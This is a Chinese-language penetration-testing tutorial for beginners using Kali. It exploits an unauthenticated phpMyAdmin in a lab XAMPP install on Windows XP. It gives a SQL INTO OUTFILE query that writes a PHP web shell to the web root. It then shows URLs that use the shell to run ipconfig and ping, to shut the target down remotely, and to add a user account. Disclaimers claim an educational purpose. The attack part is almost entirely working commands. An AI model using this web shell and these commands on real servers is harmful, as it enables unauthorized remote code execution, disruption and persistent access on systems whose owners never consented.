学习kali渗透的小白应该知道,phpmyadmin是网页版的数据库管理软件,通常以直观可视化的形式操作数据库。但是如果配置不当,就很容易登录到phpmyadmin界面,即使做了密码验证,文章提到的技术也是常用的。
phpmyadmin自我介绍
之前我们在windows靶机中搭建了web服务组件xampp,为了方便管理员操作数据库,就会自带phpmyadmin。而且这个版本的xampp集成了apache、mysql、filezilla ftp等web应用软件。
登录windows靶机的phpmyadmin,只需要在kali浏览器下使用ip/phpmyadmin的形式登录即可。
攻击phpmyadmin
我们主要是利用这个版本的xampp 中的phpmyadmin配置有误:什么错误?就是这个版本的xampp登录phpmyadmin不需要验证登录,如果设置正确,phpmyadmin是绝对不允许其他主机进行登录的,毕竟这是数据库操作后台!另外即使可以登录,你也要输入凭证进行登录!
我们就是要打开这个phpmyadmin管理页面,然后使用mysql查询命令向xp的web服务器上生成脚本文件,然后利用这个脚本文件获取远程服务器的shell。
实现原理是:
使用SQL中的SELECT语句,将一个php脚本写入到xampp服务器上,形成一个web文件。最终借助这个脚本程序远程控制目标系统!不过这都是要借助安装在底层服务的apache服务,因为只有它可以运行php脚本文件。
默认的情况下,xampp的底层根目录在c:\\xampp\htodcs\中。
SQL查询命令如下:
select "<?php system($_GET['cmd']); ?>" into outfile "C:\\\xampp\\htdocs\\shell.php"
这里全部使用英文输入,而且文件目录使用的是双反斜杠符号,而不是windows常用”\”!
使用脚本url中的system()函数命令获取系统权限,参数是cmd终端命令。然后这个脚本就会以system的身份执行。脚本生成就会写进后面的蓝色目录下的自定义文件shell.php(可以自动以文件名!)
此时,已经完成了一个能够调用windows系统权限下cmd命令的php脚本!它存在xampp web服务器中的apache安装路径下,接下来只要使用任何电脑都可以远程访问这个shell.php文件。
如果给cmd参数指定选项,就能够实现远控目标服务器!
大家也可以查询windows靶机中xampp\htdocs\下是否有shell.php文件。
既然攻击命令的脚本已经生成,那该如何利用呢?很简单,kali浏览器直接访问:
192.168.31.50/shell.php
此时就会远程触发调用目标服务器的cmd终端指令!
由于我们并没有指定cmd参数,所以在执行成功后会提示错误!
你只需要在kali浏览器输入192.168.31.50/shell.php?cmd=xxxx即可。
- 192.168.31.50/shell.php?cmd=ipconfig:通过攻击重看xp的网络配置:
仔细看,成功显示了目标靶机的ip、子网掩码、路由器网关ip
- 比如:192.168.31.50/shell.php?cmd=ping baidu.com
看看,就像使用本地的cmd终端一样,成功远程操控windows ping了baidu.com,而且也返回了数据!
- 192.168.31.50/shell.php?cmd=shutdown -s -t 10
这个就是cmd中的自动10秒钟后远程关机命令,是不是很好玩?
当然,靶机关机后,我们的kali就和它失去通信了。
至于更多的cmd命令,就不再一一演示了。其实你还可以使用下面这个命令在远程服务中新建一个自己的用户!
net user administrators abc /add
声明:本人分享该教程是希望大家,通过这个教程了解信息安全并提高警惕!本教程仅限于教学使用,不得用于其他用途触犯法律,本人一概不负责,请知悉!
免责声明:本文旨在传递更多市场信息,不构成任何投资建议和其他非法用途。文章仅代表作者观点,不代表手机电脑双黑客立场。以上文章之对于正确的用途,仅适用于学习